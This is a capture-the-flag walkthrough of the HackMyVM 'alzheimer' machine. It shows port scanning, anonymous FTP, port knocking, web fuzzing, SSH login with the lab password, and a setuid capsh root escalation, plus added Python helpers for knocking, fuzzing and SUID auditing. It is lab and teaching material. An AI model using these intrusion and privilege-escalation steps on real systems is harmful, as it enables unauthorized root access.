alzheimer ---hackmyvm

1. Scan the subnet

┌──(root㉿kali)-[/home/ace]
└─# nmap -sP 192.168.56.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-23 16:51 CST
Nmap scan report for 192.168.56.1
Host is up (0.00033s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00019s latency).
MAC Address: 08:00:27:F1:8F:2D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.128
Host is up (0.0021s latency).
MAC Address: 08:00:27:79:7F:2F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.127
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.01 seconds

2. Scan the ports

┌──(root㉿kali)-[/home/ace]
└─# nmap -sC -sV -p- 192.168.56.128 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-23 16:51 CST
Nmap scan report for 192.168.56.128
Host is up (0.0013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
21/tcp open     ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.127
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh
80/tcp filtered http
MAC Address: 08:00:27:79:7F:2F (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.70 seconds

3. The scan shows anonymous FTP is allowed, so log in as anonymous with an empty password

┌──(root㉿kali)-[/home/ace]
└─# ftp 192.168.56.128
Connected to 192.168.56.128.
220 (vsFTPd 3.0.3)
Name (192.168.56.128:ace): Anonymous    
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||31145|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        113          4096 Oct 03  2020 .
drwxr-xr-x    2 0        113          4096 Oct 03  2020 ..
-rw-r--r--    1 0        0              70 Oct 03  2020 .secretnote.txt
226 Directory send OK.
ftp> get .secretnote.txt
local: .secretnote.txt remote: .secretnote.txt
229 Entering Extended Passive Mode (|||22343|)
150 Opening BINARY mode data connection for .secretnote.txt (70 bytes).
100% |*****************************************************************************************************|    70       33.75 KiB/s    00:00 ETA
226 Transfer complete.
70 bytes received in 00:00 (18.70 KiB/s)
ftp> 

4. Read the file

[image not recovered: contents of .secretnote.txt]

The note says the other ports are hidden behind port knocking (knockd on the server side), so hit the sequence 1000, 2000, 3000 with the knock client:

┌──(root㉿kali)-[/home/ace]
└─# knock 192.168.56.128 1000:tcp 2000:tcp 3000:tcp -v
hitting tcp 192.168.56.128:1000
hitting tcp 192.168.56.128:2000
hitting tcp 192.168.56.128:3000

Scan the ports again:

┌──(root㉿kali)-[/home/ace]
└─# nmap -sC -sV -p- 192.168.56.128                   
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-23 17:35 CST
Nmap scan report for 192.168.56.128
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.127
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 b13b2b36e56bd72a6defbfda0a5d2d43 (RSA)
|   256 35f170aba366f1d6d72cf7d1247a5f2b (ECDSA)
|_  256 be15fab681d67fabc81c97a5ea11854e (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:79:7F:2F (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.62 seconds
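A scripted version of the two steps above (knock, then check whether 22 and 80 went from filtered to open), added here as an example and not part of the original write-up. It is a small Python stand-in for `knock host 1000:tcp 2000:tcp 3000:tcp -v` plus the re-scan; the host, sequence and guarded ports default to the values from the write-up, and the delay between knocks is an assumption (knockd only needs to see the SYNs in order within its sequence timeout).

```python
"""Minimal port-knock client plus a before/after probe of the guarded ports."""
import socket
import time

KNOCK_TIMEOUT = 0.5   # seconds per knock; knockd only needs to see the SYN


def knock_once(host, port, timeout=KNOCK_TIMEOUT):
    """Send one TCP knock. Returns 'connected', 'refused' or 'timeout'.

    On a knockd host the knock ports are normally closed, so 'refused' (an RST)
    is the expected result; the SYN has already been seen by the firewall log.
    A 'timeout' means the packet was dropped (filtered), which knockd also sees.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return "connected"
        except ConnectionRefusedError:
            return "refused"
        except (socket.timeout, OSError):
            return "timeout"


def knock(host, sequence, delay=0.2, timeout=KNOCK_TIMEOUT):
    """Knock each port in order, pausing `delay` seconds between hits.

    Returns a list of (port, result). Order matters: knockd compares the hits
    against its configured sequence and resets on a wrong port.
    """
    results = []
    for i, port in enumerate(sequence):
        results.append((port, knock_once(host, port, timeout)))
        if i < len(sequence) - 1:
            time.sleep(delay)
    return results


def probe(host, ports, timeout=KNOCK_TIMEOUT):
    """Return {port: True/False}; True when a TCP handshake completes.

    A filtered port (packets dropped) shows up as False via timeout; a port
    that knockd has just opened shows up as True.
    """
    return {p: knock_once(host, p, timeout) == "connected" for p in ports}


def knock_and_verify(host, sequence, guarded, delay=0.2, timeout=KNOCK_TIMEOUT):
    """Run the knock sequence and report which guarded ports it opened."""
    before = probe(host, guarded, timeout)
    hits = knock(host, sequence, delay, timeout)
    time.sleep(0.5)  # assumption: knockd inserts its iptables rule within this
    after = probe(host, guarded, timeout)
    opened = [p for p in guarded if after[p] and not before[p]]
    return {"knocks": hits, "before": before, "after": after, "opened": opened}


if __name__ == "__main__":
    # Values from the write-up; the lab VM is of course not reachable offline.
    report = knock_and_verify("192.168.56.128", [1000, 2000, 3000], [22, 80])
    for port, res in report["knocks"]:
        print(f"hitting tcp {port}: {res}")
    print("opened:", report["opened"])
```

Expect three `refused` (or `timeout`) results for the knocks themselves; that is normal, the knock ports never open. What matters is the `opened` list afterwards, which on this box should be [22, 80].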
                                                                     

Port 80 (and 22) is open now, so the web page can be fetched:

┌──(root㉿kali)-[/home/ace]
└─# curl -l 192.168.56.128
I dont remember where I stored my password :(
I only remember that was into a .txt file...
-medusa

<!---. --- - .... .. -. --. -->

5. Fuzz for .txt files with wfuzz. (The HTML comment above is Morse code for NOTHING, so the only real hint is the .txt file. Note the 13 hits below: they are the wordlist's '#' comment lines. A bare '#' in the URL starts a fragment, so each of those requests actually fetched '/', the 132-byte index page; hide them with --hh 132 or strip comment lines from the wordlist.)

┌──(root㉿kali)-[/home/ace]
└─# wfuzz -c --hc=404 -t200 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt http://192.168.56.128/FUZZ.txt 
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.128/FUZZ.txt
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                          
=====================================================================

000000001:   200        5 L      27 W       132 Ch      "# directory-list-2.3-medium.txt"                                                
000000007:   200        5 L      27 W       132 Ch      "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"                
000000003:   200        5 L      27 W       132 Ch      "# Copyright 2007 James Fisher"                                                  
000000004:   200        5 L      27 W       132 Ch      "#"                                                                              
000000002:   200        5 L      27 W       132 Ch      "#"                                                                              
000000005:   200        5 L      27 W       132 Ch      "# This work is licensed under the Creative Commons"                             
000000008:   200        5 L      27 W       132 Ch      "# or send a letter to Creative Commons, 171 Second Street,"                     
000000006:   200        5 L      27 W       132 Ch      "# Attribution-Share Alike 3.0 License. To view a copy of this"                  
000000009:   200        5 L      27 W       132 Ch      "# Suite 300, San Francisco, California, 94105, USA."                            
000000010:   200        5 L      27 W       132 Ch      "#"                                                                              
000000011:   200        5 L      27 W       132 Ch      "# Priority ordered case-sensitive list, where entries were found"               
000000012:   200        5 L      27 W       132 Ch      "# on at least 2 different hosts"                                                
000000013:   200        5 L      27 W       132 Ch      "#"                                                                              
Total time: 0
Processed Requests: 220560
Filtered Requests: 220547
Requests/sec.: 0
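The two points above in code, as an added example that is not from the original write-up: it pulls the HTML comment out of the index page and decodes it as Morse, and it rebuilds the FUZZ.txt run so that wordlist comment lines are skipped, the word is percent-encoded (a raw '#' would turn into a fragment and fetch '/'), and responses the same size as the index page are dropped, which is what --hh 132 does. HTTP is replaced by an injectable fetch so it runs offline; the file name hypothetical_note.txt and the tiny wordlist are constructed stand-ins, not the VM's real file.

```python
"""Index-page recon and a fuzz pass that avoids the wfuzz false positives."""
import re
from urllib.parse import quote, urljoin, urlparse

# Constructed copy of the index page body returned by curl in the write-up
# (132 bytes, 5 lines, 27 words: the same numbers wfuzz printed for the hits).
INDEX_HTML = (
    "I dont remember where I stored my password :(\n"
    "I only remember that was into a .txt file...\n"
    "-medusa\n\n"
    "<!---. --- - .... .. -. --. -->\n"
)

# Constructed wordlist: two comment lines as in directory-list-2.3-medium.txt,
# then a few words. 'hypothetical_note' is an assumption, not the real file.
WORDLIST = ["# directory-list-2.3-medium.txt", "#", "index", "hypothetical_note", "admin"]

MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
}


def html_comments(html):
    """Return the bodies of all <!-- ... --> comments, whitespace-trimmed."""
    return [m.strip() for m in re.findall(r"<!--(.*?)-->", html, re.S)]


def decode_morse(code):
    """Decode space-separated Morse; '/' separates words; unknown symbols -> '?'."""
    words = []
    for word in code.split("/"):
        words.append("".join(MORSE.get(sym, "?") for sym in word.split()))
    return " ".join(words)


def naive_candidates(base_url, wordlist, ext=".txt"):
    """What plain FUZZ.txt substitution does: the raw line spliced into the URL."""
    return [base_url + line + ext for line in wordlist]


def candidates(base_url, wordlist, ext=".txt"):
    """Skip blank/comment lines and percent-encode the word so that '#', '?'
    or spaces cannot change which path the server actually sees."""
    urls = []
    for line in wordlist:
        word = line.strip()
        if not word or word.startswith("#"):
            continue
        urls.append(urljoin(base_url, quote(word, safe="") + ext))
    return urls


def fuzz(urls, fetch, baseline_len=None):
    """Request each URL via fetch(url) -> (status, body_len).

    404s are dropped (wfuzz --hc=404); responses whose length equals the
    baseline are dropped too (wfuzz --hh). Returns [(url, status, length)].
    """
    hits = []
    for url in urls:
        status, length = fetch(url)
        if status == 404 or (baseline_len is not None and length == baseline_len):
            continue
        hits.append((url, status, length))
    return hits


def fake_fetch(url):
    """Constructed stand-in for the nginx on the VM: '/' is the index page, one
    hypothetical .txt exists, everything else is 404. Like a real HTTP client,
    urlparse drops the '#...' fragment, so a '#' word collapses to '/'."""
    path = urlparse(url).path
    if path == "/":
        return 200, len(INDEX_HTML)
    if path == "/hypothetical_note.txt":
        return 200, 40
    return 404, 0


if __name__ == "__main__":
    for c in html_comments(INDEX_HTML):
        print("comment:", c, "->", decode_morse(c))
    base = "http://192.168.56.128/"
    print("naive :", fuzz(naive_candidates(base, WORDLIST), fake_fetch))
    print("fixed :", fuzz(candidates(base, WORDLIST), fake_fetch))
```

Against a live target, replace fake_fetch with a function that does a real GET and returns (status, len(body)); the filtering logic is unchanged.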

6. Try SSH

Password (held in the .txt file the index page mentions; the matching hit is not visible in the truncated fuzz output above): Ihavebeenalwayshere!!!

Login successful:

┌──(root㉿kali)-[/home/ace]
└─# ssh medusa@192.168.56.128                                                                                                      
The authenticity of host '192.168.56.128 (192.168.56.128)' can't be established.
ED25519 key fingerprint is SHA256:O2S8HAtlJxSTJJgIQUiIzsbSKX/qj9Thyn38JM6wsBY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.128' (ED25519) to the list of known hosts.
medusa@192.168.56.128's password: 
Linux alzheimer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct  3 06:00:36 2020 from 192.168.1.58
medusa@alzheimer:~$ 

7. Privilege escalation

medusa@alzheimer:~$ find / -user root -perm -4000 -print 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/sbin/capsh

Notice /usr/sbin/capsh. It is not setuid root on a stock Debian install, and capsh will setgid/setuid to whatever it is told before exec'ing a shell, so with the setuid bit it simply hands out a root shell:

[image not recovered: capsh note]

medusa@alzheimer:~$ /usr/sbin/capsh --gid=0 --uid=0 --
root@alzheimer:~# 
root@alzheimer:~# cd root
bash: cd: root: No such file or directory
root@alzheimer:~# cd ..
root@alzheimer:/home# cd .
root@alzheimer:/home# cd ..
root@alzheimer:/# ls
bin   dev  home        initrd.img.old  lib32  libx32      media  opt   root  sbin  sys  usr  vmlinuz
boot  etc  initrd.img  lib             lib64  lost+found  mnt    proc  run   srv   tmp  var  vmlinuz.old
root@alzheimer:/# cd root
root@alzheimer:/root# ls
root.txt
root@alzheimer:/root# cat root.txt 
HMVlovememories
root@alzheimer:/root# 
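The enumeration step above, as an added example that is not from the original write-up: a Python equivalent of `find / -user root -perm -4000` plus a diff against a baseline, so that an extra setuid-root binary like capsh stands out instead of being read out of a 13-line list by eye. The baseline is an assumption built from the write-up's own list minus capsh (the remaining entries are the stock Debian 10 setuid-root binaries); build yours from a known-good image. The shell-spawner set is a short list of binaries known to give a root shell when setuid root, with capsh from this box.

```python
"""SUID audit: find setuid-root files and flag ones outside a baseline."""
import os
import stat

# Assumption: baseline taken from the write-up's list minus capsh.
DEBIAN10_BASELINE = {
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/bin/chsh", "/usr/bin/sudo", "/usr/bin/mount", "/usr/bin/newgrp",
    "/usr/bin/su", "/usr/bin/passwd", "/usr/bin/chfn", "/usr/bin/umount",
    "/usr/bin/gpasswd",
}

# Binaries that hand out a root shell when setuid root. capsh does it via
# `capsh --gid=0 --uid=0 --`: setgid(0)/setuid(0) succeed because the
# effective uid is already 0, then `--` execs bash.
SHELL_SPAWNERS = {"capsh", "bash", "sh", "dash", "env", "python3", "perl", "find", "vim"}

# Pseudo-filesystems that `find /` wastes time on (and that can hang reads).
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def is_setuid_owned_by(st, uid):
    """True when the stat result is a regular file with the setuid bit and the given owner."""
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID) and st.st_uid == uid


def find_setuid(root="/", owner_uid=0):
    """Walk `root` and return sorted paths of setuid files owned by owner_uid.

    Mirrors `find / -user root -perm -4000 2>/dev/null`: unreadable
    directories are skipped silently and symlinks are not followed.
    """
    found = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        if dirpath in SKIP_DIRS:
            dirnames[:] = []   # do not descend
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if is_setuid_owned_by(st, owner_uid):
                found.append(path)
    return sorted(found)


def audit(paths, baseline=DEBIAN10_BASELINE, spawners=SHELL_SPAWNERS):
    """Split a setuid list into what is outside the baseline and what can spawn a shell."""
    unexpected = sorted(p for p in paths if p not in baseline)
    shells = sorted(p for p in paths if os.path.basename(p) in spawners)
    return {"unexpected": unexpected, "shell_spawners": shells}


if __name__ == "__main__":
    report = audit(find_setuid("/"))
    print("not in baseline :", report["unexpected"])
    print("shell spawners  :", report["shell_spawners"])
```

On the box this prints /usr/sbin/capsh under both headings, which is exactly the line that matters in the `find` output above.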
